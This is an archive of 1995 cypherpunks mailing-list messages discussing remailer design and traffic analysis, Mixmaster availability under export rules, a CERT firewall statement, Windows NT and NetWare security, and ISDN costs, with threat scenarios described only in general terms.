bit of remailer traffic necessary for traffic analysis?  Or would having a  
good percentage of it be sufficient?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 26 Jan 95 11:23:30 PST
To: cypherpunks@toad.com
Subject: CERT statement
In-Reply-To: <199501260516.AAA17150@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950126142119.21338C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Is it my imagination, or is CERT just trying to firewall up the internet 
into uselessness?

What we need to concentrate on is secure systems that are not vulnerable 
to IP spoofing, as opposed to firewalls.

But of course, more firewalls makes more free transfer of information 
across the internet more difficult...perhaps this is what the government 
is interested in reducing.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Thu, 26 Jan 95 11:36:49 PST
To: kevin@elvis.wicat.com
Subject: Re: MixMaster remailer source
In-Reply-To: <9501261726.AA18771@toad.com>
Message-ID: <Pine.SUN.3.91.950126143409.25147A-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995 kevin@elvis.wicat.com wrote:

>     A little while back when the "remailer crisis" discussion was in
> full swing, L. McCarthy recommended the Mixmaster remailer as being the
> most modern. After several days of hunting, I have utterly failed to
> turn up the source to this remailer. Can anyone provide me a pointer?

	Send mail to the author, Lance Cotterell <loki@nately.ucsd.edu>. 
He'll give you the hidden directory on his ftp site nately.ucsd.edu once 
he verifies that you're in the US or Canada.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 26 Jan 95 14:44:59 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Even more unix holy war.  Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501261711.AA16623@snark.imsi.com>
Message-ID: <Pine.3.89.9501261422.A26742-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> Unix is perfectly easy to use. Its no worse than DOS.

Thanks for the entertainment Perry.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 26 Jan 95 12:56:35 PST
To: cypherpunks@toad.com
Subject: pgp content type RFC
Message-ID: <9501262055.AA07113@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please provide me with the number of the MIME PGP content-type RFC?

thanks!
andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 11:57:13 PST
To: cypherpunks@toad.com
Subject: Re: MixMaster remailer source
In-Reply-To: <9501261726.AA18771@toad.com>
Message-ID: <199501261958.OAA06997@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Kevin writes:
>     A little while back when the "remailer crisis" discussion was in
> full swing, L. McCarthy recommended the Mixmaster remailer as being the
> most modern. After several days of hunting, I have utterly failed to
> turn up the source to this remailer. Can anyone provide me a pointer?

Due to the ITAR, you have to get it from Lance Cottrell by request (and you
have to be in the U.S./Canada):

--- begin included excerpt of message ---
From: Lance Cottrell
Date: Sun, 8 Jan 1995 00:09:54 -0800
To: cypherpunks@toad.com

[...]
Message size can best be handled by using a remailer which uses messages
which never change size. Mixmaster is now ready for testing.
It still does not run on Linux or FreeBSD. I don't know what else it does
run on. It works great on Sun machines with gcc.

Since it is export restricted, send me mail and I will send you the name of
the hidden directory to get the file.
[...]
--- end included excerpt of message ---

His primary account is loki@nately.ucsd.edu; he also has a dialup account --
lcottrell@popmail.ucsd.edu. He's on the c'punks list (Hi Lance !).

In addition to being backwards-compatible with the Finney/Ghio/Hughes format
of remailer messages, Mixmaster supports a new message format in which all
original messages are chopped/padded for transmission, resulting in a uniform
packet size. Mixmaster also automatically reorders messages of all formats, 
using a fixed-size pool.

Mixmaster is designed around PGPTools, with the intent to support full use of
PGP. Unfortunately I've seen some empirical evidence that PGP messages don't
quite work with the system at present. Neither of the Mixmaster remailers of
which I'm aware ("mix" and "q") is indicated as supporting PGP in Raph's
current list. Solving this apparent problem, and porting Mixmaster to Ultrix
(might be trivial, I haven't tried yet) are among my top c'punk priorities
right now.

Of course it would be nice to produce an exportable version of Mixmaster too...

 -L. Futplex McCarthy, seeking a summer job/internship; BS CS Cornell + 2 yrs.
  grad school in theoretical computer science (algebraic algorithms), planning
  a Ph.D.; send private email for, or with, further info

[I don't speak for Lance Cottrell and he doesn't speak for me.]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Ray Arachelian <rarachel@prism.poly.edu>
Date: Thu, 26 Jan 95 12:16:59 PST
To: cypherpunks@toad.com
Subject: Internet Mailing lists book
Message-ID: <Pine.3.05.9501261542.A15834-b100000@prism.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain


I found a 1993 version of this book (is there a 94 or 95?) it unfortunatly
lacks the cypherpunks list. >8-(


===============================================================================
| + ^ + || ' . . .   .   . .   .             Ray  (Arsen)  Arachelian        ||
|  \|/  ||   . . .  ' . ' .  : . .           rarachel@photon.poly.edu        ||
|<--+-->||.   . . |' '| .' .  .  ...    ___  sunder@intercom.com             ||
|  /|\  ||   .  . \___/ .  . . : .... __[R]                                  ||
| + v + || . oOOo /o.O\ oOOo :. : ..    |A| "And bugs to kill before I sleep"||
=========/---vvvv-------VVVV------------|I|----------------------------------/
        /      .    :   . ' : '         |D|     This signature pannel is    /
       /  The Next Bug to kill(tm)      ---     now open.                  / 
      /___________________________________________________________________/
GCS d++(---)(-) H s+++/++ !g !p !au a- w-(+) (!v | v)  C+++++ Coherent++++ 
L+ 3 C+ V+ P? E- N++ K- W W--- M++ V-- po- Y+++ t:[tos+, tng--, ds9+] 5 !j
!R G? tv+ b+++ D+ B--- e+(- | *) u--- h+++ f+(++) r++ n+(---) x**(++)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 12:28:25 PST
To: cypherpunks@toad.com
Subject: Re: An article on Windows (in)security
In-Reply-To: <9501261717.AA08133@sulphur.osf.org>
Message-ID: <199501262029.PAA07089@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >  Windows NT must evolve quickly to garner a spot in the secure operating
> >system arsenal or somehow steal market share from the likes of Novell. It
> >just is not there yet. But Microsoft's Phaup left me with one closing
> >thought. ``Have you talked to the Cairo [Windows 95.5] guys yet?''
> >
> >  2Schwartau is an independent consultant, writer and lecturer on network
> >security topics. He can be reached at Interpact, Inc. at (813) 393-6600, or
> >via electronic mail at P00506@psilink.com.

FYI, there's been some controversy lately on the Firewalls list about Winn
Schwartau. For one thing, he apparently works as a marketer for the company
that makes the Sidewinder firewall, so this "independent consultant" bit has
been judged rather misleading by some people. Last I saw, someone was 
requesting an apology/explanation from Internet World or some such magazine
for the last paragraph above, or a reasonable facsimile.
This arose because he apparently wrote a highly favorable review of Sidewinder
for the aforementioned `zine, in which he also criticized Bellovin & Cheswick's
firewalls bible for not discussing "type enforcement" (used/implemented by 
Sidewinder).  The latter criticism has been vigorously defended by some third
parties, and I don't know enough about the subject to make any clear judgement
about it. Anyway, since he's knocking the security of something else in the
article here, I thought it appropriate to point all this out.

[Lest anyone ask me, you can join the firewalls list by sending mail to
 majordomo@greatcircle.com with "subscribe firewalls" in the body, not in the
 subject. There's a digest format (use "subscribe firewalls-digest") which I
 recommend over the standard list distribution.]

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Thu, 26 Jan 95 15:41:39 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501241501.HAA21364@largo.remailer.net>
Message-ID: <Pine.A32.3.91c.950126152907.79370E-100000@mead2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Eric Hughes wrote:

>    From: root <root@einstein.ssz.com>
> 
>    Exactly how does this work at your location Eric? Here in Southwestern Bell
>    we don't use the D except for call initiation and termination. There is no
>    useage tarriff other than this. 
> 
> The standard residential tariff here in Pac Bell is flat rate duing
> non-business hours and per-minute during them.

Most LEC's charge per-minute for ISDN.  Pac Bell and SWBT are some of the 
few exceptions.  What's even worse is in some states there isn't even a 
residential ISDN tariff, hence all ISDN lines are "business" lines and 
billed accordingly.  The only real solution is to demand dial the 
connection from both ends.  This is fairly straightforward assuming your 
provider is set up for it, since there is a lot of ISDN equipment that 
will brfing the connection up only when there are packets to send then 
idle it out.

An economical alternative in some areas is frame-relay.  In Washington 
state USwest wants ~$70/month for a 56k FR link to anywhere in your 
LATA.  The providers around here charge $100-$150 to link a single 
machine to the net via FR, and $150-$350 if you are routing a whole 
subnet.

-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 26 Jan 95 15:48:07 PST
To: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <199501262347.AA24792@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Andrew Lowenstern asks:

> Is this even technically possible?  That is, wholesale monitoring of  
> disparate portions of the net from a single access point.  Given the  
> distributed and dynamic properties of the Net this would seem impossible.  To  
> monitor the entire remailer network an attacker would have to setup packet  
> sniffers upstream from each and every portion of the Net that contained a  
> remailer, wouldn't they?

Given the current state of computer security, this should 
not be too difficult for an organization such as NSA.  For 
each remailer, just hack into a computer on its local 
ethernet and put it into promiscious mode.  Each time an 
e-mail passes by, have it send the header to some monitoring 
center using an UDP packet.

> I suppose an extremely resourceful attacker could monitor traffic at crucial  
> points (i.e. transcontinental feeds, points on the NFSnet, CIX, etc...), but  
> there are so many private connections linking networks that it would be very  
> difficult indeed to sniff out every bit of remailer traffic.  Is having every  
> bit of remailer traffic necessary for traffic analysis?  Or would having a  
> good percentage of it be sufficient?

Complete monitoring should not be neccessary, having a 
larger percentage of the traffic just makes the job easier.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLygz8jl0sXKgdnV5AQFv3wP/USeKOwPBn12m1hC9RPOgwi1Zt4wB+T5J
RWM3fYAvpK4gGUB2xOGrSLDh68DNDgSghjwqacBTkEsn+5ENBXd9rrQOjmaMeipI
rJuxYSJTiNKhlGro3yY2UW3FScKYks3mi6eJ9G+g5rOOIHqCKtAhkSQJkHeCJOM3
3m2ObHv1gMs=
=xmaK
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> Big Bang --> atoms --> complex macromolecules --> biological evolution
--> central nervous systems --> social learning --> symbolic communication
--> computers --> internetworking --> close-coupled automation
--> high-bandwidth brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Thu, 26 Jan 95 14:13:45 PST
To: cypherpunks@toad.com
Subject: "Subway" remailers
Message-ID: <9501262213.AA23510@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Need ideas/comments:

I have been modeling remailer scenarios using IBM VM/ESA virtual
machines. After fwaffing a bit, looking at the traffic analysis
concern, and taking note of some of the probability work posted
recently, I thought I might throw this idea out for a sanity check:

"Subway" remailers.

"Subway" remailers would exchange identical sized "containers", much
like a subway at semi-regular pulses or intervals. It would require
a ring of remailers large enough (yeah, I know) to make traffic analysis
of entrance and exit points difficult and/or expensive.

Each container would contain either fixed or variable slots for
multiple messages. Containers could be full, partially full, or
even empty. (there would probably have to be a max message size)

Subway remailers would be able to carry a message to a designated
"last" remailer or to deliver blindly to a "last" remailer of
random choosing.

Messages may or may not change containers at the various
stations/remailers. It could be randomized.

Possible header scripts:

X-Subway-Script: Ride 2; Latent: 03:30; Ride 3; Deliver;

or many other possibilities.

The whole container would be encrypted to the next remailer,
giving the next remailer the same access to exchange passengers
or to make them wait in a latent state.

The quirkier matters on this are how to handle PGP so that
nothing is compromised and for how the remailers to identify
each other as "friendly and operational" so the subway system
does not have a traffic jam.

Crypto comments please.

------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Thu, 26 Jan 95 13:39:44 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
Message-ID: <9501262142.AA07376@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> What we need to concentrate on is secure systems that are not vulnerable 
>> to IP spoofing, as opposed to firewalls.

You're exactly right.  However, getting people to deploy real security
systems is nearly impossible.  My company sells a kerberos system, and
although everyone is saying they want security, nobody really
understands what this means, and as soon as we tell them that it
actually involves effort, they become far less interested.  Even
though I've seen companies get hosed because of lame security, the
people who matter aren't willing to commit.

I'm hoping that as firewalls begin to fall, that the CERT will stop
recommending half-assed solutions.  We'll have to wait and see.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Thu, 26 Jan 95 14:04:43 PST
To: cypherpunks@toad.com
Subject: Re: anonymous IRC access....
In-Reply-To: <199501250211.VAA11047@blue.seas.upenn.edu>
Message-ID: <8j_1jdy00VIE07sYB8@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu> wrote:

> Is there anyway to get anon irc access?  there used to be a way to
> get it a couple of years ago but I can't find any ways to do it now....

ftp myriad.pc.cc.cmu.edu /pub/unix/misc/anonirc*

Of course, you need to find someone willing to install that on their site....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill O'Hanlon <wmo@digibd.com>
Date: Thu, 26 Jan 95 15:58:49 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501262358.AA16253@poe.digibd.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Jan 1995 14:43:39 -0800 (PST)  "James A. Donald" wrote:
--------
> On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> > Unix is perfectly easy to use. Its no worse than DOS.
> 
> Thanks for the entertainment Perry.
> 

(I'm assuming you're being sarcastic.)

I had agreed with Perry's statement when I saw it.  I've taught classes in both
DOS and UNIX.  Whenever I've taught people who knew next to nothing about
computers, I found people were able to attain a basic "user" sort of skill
level in about the same amount of time with about the same difficulty when 
learning either.

If you're going to be snotty and sarcastic, the least you could do is provide
a counter-example, to give us something to discuss.  After you showed your
heinie (IMHO) in your comments about operating system security the other day.
I'd think you'd have lost credibility to gain.  I mean, I was tempted to
make a comment to you much like the one you made to Perry, but I didn't think
it was worth the time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 26 Jan 95 16:13:22 PST
To: flatline@u.washington.edu (Christopher E Stefan)
Subject: Re: The Remailer Crisis
In-Reply-To: <Pine.A32.3.91c.950126152907.79370E-100000@mead2.u.washington.edu>
Message-ID: <199501270002.SAA00862@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> Most LEC's charge per-minute for ISDN.  Pac Bell and SWBT are some of the 
> few exceptions.  What's even worse is in some states there isn't even a 
> residential ISDN tariff, hence all ISDN lines are "business" lines and 
> billed accordingly.  The only real solution is to demand dial the 
> connection from both ends.  This is fairly straightforward assuming your 
> provider is set up for it, since there is a lot of ISDN equipment that 
> will brfing the connection up only when there are packets to send then 
> idle it out.
>
Here in SWB territory there are residential and business rates for ISDN.
 
> An economical alternative in some areas is frame-relay.  In Washington 
> state USwest wants ~$70/month for a 56k FR link to anywhere in your 
> LATA.  The providers around here charge $100-$150 to link a single 
> machine to the net via FR, and $150-$350 if you are routing a whole 
> subnet.
>
Be shure to multiply these costs by 2 since a singe 56k is approx. half of
2 B's that have been bonded. I specificaly looked for a provider who didn't
charge according to how many machines I have on the other end. I am buying
the ability to send a certain amount of bits over a wire in a certain amount
of time. Whether those bits come from 1 or 100 machines is irrelevant.

I would have no problem w/ interNIC chargeing for registering IP's (which I
hear may happen sooner than we realize) since I got a full 'C' when I set up.
We already use 23 of the addresses and will be looking at adding at least a
couple of more in the near future.

In the case of the CombiNet 160 the choice of 'idle-out' or 'tear-down' is
one of software. The codec is programmed via a serial line (which the dox say
can be hooked to a modem, as if anyone was that stupid) port and has its own 
little menu system. I keep both my B's running all the time.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew K Bressen <bressen@cs.columbia.edu>
Date: Thu, 26 Jan 95 15:18:38 PST
To: cypherpunks@toad.com
Subject: Re: Win NT security
Message-ID: <199501262314.SAA26672@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>  Kevin Phaup, program manager lead of Microsoft's Business Systems
>>Division, put the best spin he could on this first major Windows NT
>>shortcoming. ``Pull the data into a database and then massage it,'' he said.
>>``We have a new product - System Management Server from the Back Office
>>Suite - that could help.''
>>  I agree, but why would I want to buy a brand-new operating system that
>>needs help out of the box?

Because there aren't any that do not.
OS/2 1.x and 2.x had no performance monitoring tools, Windows 3.1 and
3.11 didn't initially come with TCP/IP, Mac owners for the longest
time had to buy suitcase and still buy ramdoubler, VMS doesn't support
RAID out of the box... systems and utility software has been with us
for a long time, and will be for a while yet. 

At one facility where I work (an NYC brokerage) we run at least 200
users each on ultrix, VMS, NT 3.5, WFW 3.11, Windows 3.1, and VM/CMS,
and have about ten OS/2 1.3 servers as well. NT users require less
help with networking than dos users, more than unix users.  Backup is
easier with NT than dos, but harder than VMS.  RAID is easier than
with VMS or unix, but multiple redundantly clustered systems aren't
available for NT. Systems management is slightly harder than VMS or
unix, but much easier than WFW. NT crashes more than VM/CMS, but less
than ultrix 4.2 did and much less than dos windows does.

>>  What's more, the third-party database solution for security administration
>>is a hopeless short-term patch. To be truly effective, it needs a much
>>tighter integration with Windows NT's APIs to permit not only systemic
>>analysis, but also systemic security changes based on selected criteria.

huh? you just specced out what it needs to work; I don't see why this
would be a problem for symantec or some similar firm to deliver. The
API is published and fairly stable, NT users just have to wait for
someone to actually do it.

>>  If administrators want to change the access rights of every user so they
>>can log on at 7 a.m. instead of 8 a.m., they cannot do it with Windows NT
>>3.5. They might be able to do it with a third-party product or with Windows
>>NT 4.0.

they can't do it with unix either without coding some, and with dos
windows you can just forget about it. 

>>  ``If someone builds an administration product like that, they'll make a
>>lot of money,'' Phaup says.

yep. so what makes you say that it is "hopeless"?

>>  A  WEEKEND'S  WORK  Windows NT has other security problems, as well. For
>>example, it does not have data cryptography, which is essential to make sure
>>a network is reasonably secure from eavesdropping and integrity breaches.

um, what OS does, out of the box? especially in a 1.5 release...
heck, I'm not aware of any networkable OS that has end-to-end link and
application level encryption, file acl's, and a key management scheme
that can be both centrally and distributedly administered. Kerberos
and AFS both make a start in these directions, but are not there yet.

>>Microsoft, which knows encryption technology, easily could have included the
>>appropriate algorithms in software to make Windows NT more secure.

please to define easily? the NT 3.5 release slipped enough as it was.

>>  Microsoft's Phaup agrees it would have been simple to add encryption to
>>Windows NT. ``The hooks are all there,'' he said.

so are the hooks for UFS support, and for WINS-DNS integration. the os
has more hooks than a football field covered in velcro. so what?

>>  But Windows NT does not need cryptography for C2 certification. And
>>perhaps even more telling, Microsoft cannot export cryptography outside the
>>U.S. due to export control laws that prohibit it from doing so without
>>licensing. Of course, the company could have made two versions of Windows
>>NT: one with crytography for domestic use and one without cryptography for
>>export.
>>
>>  According to Phaup, Microsoft was reluctant to do so for two reasons.
>>``Security is way down on the list of corporate concerns and desires and
>>wants in an OS. It's in the top 20, but not the top 3,'' he says. ``And the
>>testing cycle would have been a double killer.''

summary: consumers aren't demanding security and it would cost time
and money to put it in, so we didn't make it a priority, but we did
leave hooks for it. so why are you villifying them? overall, this
sounds pretty reasonable.

>>  Windows NT's last major shortcoming lays in the omission of a feature that
>>most security experts consider virtually indispensable: boot control.

um, which security experts would these be? I sure don't consider the
absence of boot control on my 400 VMS and unix workstations to be much
of a concern...

>>  In the DOS/Windows world, third-party PC security is reasonably attempted
>>by forcing users to boot from the C drive and making them log on with IDs
>>and passwords. 

And NT does this.

>>... However, if a bootable DOS diskette is inserted in the A 
>>drive, the PC will boot without a logon, and the A:> will appear.
>>
>>  But if the user attempts to log over to the C drive, the system will come
>>back with a message such as: Invalid drive specification. Security experts
>>recognize this as an inexpensive technique that will keep out casual
>>intruders and nontechnical types.

Well, booting off of a DOS diskette in drive A sure won't let you at
my NTFS C: drive... though I'm not sure how technical an intruder
would have to be to find the users password written down somewhere on
their desk, or to try their initials or first name...

>>  One way to mandate boot control is with a hardware or firmware addition to
>>the PC in the form of an add-on card. 

Or a key lock on the power supply or a passsword lock in the CMOS of the
machine, both of which are available from several major hardware
vendors, and neither of which cares if the machine is dos, nt, unix,
or pick.

>>  In Windows NT, boot control does not even exist as an option. 

Huh? The key lock on my DEC PC works just fine, and the CMOS lock on
the compaqs here doesn't care what the OS is...

>>... Again, this
>>suggests that Microsoft's security effort was driven by C2 certification,
>>not by security itself.

OK, the federal government spends millions of dollars coming up with a
security spec for computers that they buy. Microsoft wants to sell
the fed NT, so they make sure NT can pass the spec. I fail to see the
shortcoming on their part. Out of the box NT is more secure than DOS, Windows,
Windows for Workgroups, and most flavors of unix more than two years
old. A well administered group of NT machines can be more secure than a
poorly administered group of VMS, Novell, or unix systems.

It is not the most secure OS ever devised. It sure isn't B2. This
doesn't strike me as unreasonable, though we could wish for better.

>>  Windows NT must evolve quickly to garner a spot in the secure operating
>>system arsenal or somehow steal market share from the likes of Novell. It

How is Novell more secure or securable than NT?
Comparing an OS to a networking system, strikes me as unproductive;
people run Novell on servers, not desktops. NT can run a 32 bit API on
several 64 bit flavors of hardware, it is multitasking and
multithreaded... comparing it to Novell is apples and oranges.

If you're comparing Novell+DOS (or DOS/Windows) to NT, then right out
of the box, your above statements seem reversed: if the data is on the
desktop, and the PC doesn't have extra security hardware, then I can
floppy boot the pc and get the data, but I'll need a username and
password to get into the NT system. If the data is on the server, then
under either system I'll need a username and password. Neither one
will stop me from taking the hard drive and sticking into a machine I
have control of and getting the data. 

- --a. k. bressen
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLygs0yoZzwIn1bdtAQG/YQF9EpEzsvQvEDdBnoROxlgAUK0YMrFTR35b
FvT1uqcLEqfCo65qJ2qpSmX0SC+Hin5u
=eTTq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 26 Jan 95 16:41:13 PST
To: Andrew K Bressen <bressen@cs.columbia.edu>
Subject: Re: Win NT security
Message-ID: <9501270039.AA07184@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  How is Novell more secure or securable than NT? Comparing an OS to
>  a networking system, strikes me as unproductive; people run Novell
>  on servers, not desktops. NT can run a 32 bit API on several 64
>  bit flavors of hardware, it is multitasking and multithreaded...
>  comparing it to Novell is apples and oranges.

actually, NetWare has a 32-bit API, runs on 64-bit hardware (maybe, they have  
a SPARC version and may have a PA version, but I haven't kept up), is  
multitasking and multithreaded.  Most people don't think of NetWare as a Real  
OS(*tm), but it is QUITE robust.  You could put it on someones desk, but it  
doesn't run windows.  The main reason it's primarily a server OS is because  
Novell markets it that way.

What is really cool about NetWare that has more cypherpunks relavance than  
most of this thread is that it has built-in support for single point network  
logins via RSA authenticated certificates (the inital password exchange is  
encrypted with RSA as well).  This has been a feature for about 2 years now  
and is, as far as I know, the only major operating system that has native  
support (at all levels of the OS - not a Unix with kerberos thrown in) for  
such a thing out of the box.  NetWare has a much more sophisticated security  
system than any Unix I've seen or heard about.

My only complaint against Novell here is they think details about the  
security system are a big secret (such as RSA key lengths and the specific  
PRNG and hashing algorithms used).  Pretty typical corporate mentality at  
work...  While they may use RSA, it is my understanding that Novell in the  
past has used weak home-grown hashing and encryption algorithms for password  
storage.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 15:53:05 PST
To: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <9501261922.AA07092@ch1d157nwk>
Message-ID: <9501262352.AA17798@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Lowenstern says:
> Is this even technically possible?  That is, wholesale monitoring of  
> disparate portions of the net from a single access point.

Sure -- you need to have packet forwarders installed all over the
place, but thats easy to do -- there are commercial network monitoring
products that will do the job for you. In that sense, you can't do it
from a single access point.

> To monitor the entire remailer network an attacker would have to
> setup packet sniffers upstream from each and every portion of the
> Net that contained a remailer, wouldn't they?

Largely, although they could be smart about how they did it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 15:55:08 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: CERT statement
In-Reply-To: <Pine.SUN.3.91.950126142119.21338C-100000@thrash.src.umd.edu>
Message-ID: <9501262354.AA17806@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> Is it my imagination, or is CERT just trying to firewall up the internet 
> into uselessness?

No, they are trying to protect people. I'm about the biggest critic of
CERT out there, but I don't disagree with what they said -- although
its insufficient.

> What we need to concentrate on is secure systems that are not vulnerable 
> to IP spoofing, as opposed to firewalls.

The only way to do that is cryptographic security. See draft-metzger-*
in the nearest internet drafts repository.

> But of course, more firewalls makes more free transfer of information 
> across the internet more difficult.

No they don't. I'm talking across one right now. I barely if ever
notice it.

> perhaps this is what the government is interested in reducing.

Please confine the paranoia to places where it is justified. Firewalls
are a good and important thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 16:07:07 PST
To: Marc Horowitz <marc@cam.ov.com>
Subject: Re: CERT statement
In-Reply-To: <9501262142.AA07376@dun-dun-noodles.cam.ov.com>
Message-ID: <9501270006.AA17831@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Marc Horowitz says:
> You're exactly right.  However, getting people to deploy real security
> systems is nearly impossible.  My company sells a kerberos system, and
> although everyone is saying they want security, nobody really
> understands what this means, and as soon as we tell them that it
> actually involves effort, they become far less interested.

Kerberos per se isn't sufficient to defend against session hijacking
attacks, you know. The situation in question is really insidious and
requires packet-by-packet cryptographic authentication.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 16:11:14 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <Pine.3.89.9501261422.A26742-0100000@netcom10>
Message-ID: <9501270010.AA17843@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> On Thu, 26 Jan 1995, Perry E. Metzger wrote:
> > Unix is perfectly easy to use. Its no worse than DOS.
> 
> Thanks for the entertainment Perry.

I see that you have no arguments against my statement...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Thu, 26 Jan 95 16:09:05 PST
To: perry@imsi.com
Subject: Re: CERT statement
In-Reply-To: <9501270006.AA17831@snark.imsi.com>
Message-ID: <9501270011.AA07672@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Kerberos per se isn't sufficient to defend against session hijacking
>> attacks, you know. The situation in question is really insidious and
>> requires packet-by-packet cryptographic authentication.

No, but kerberos or something like it is necessary.  And I think I can
safely say that anything which really defends against TCP sequence
spoofing or hijacking attacks will be more invasive and require more
effort than kerberos, not less.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 26 Jan 95 16:14:33 PST
To: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: pgp content type RFC
In-Reply-To: <9501262055.AA07113@ch1d157nwk>
Message-ID: <9501270014.AA01032@squeamish-ossifrage.mit.edu>
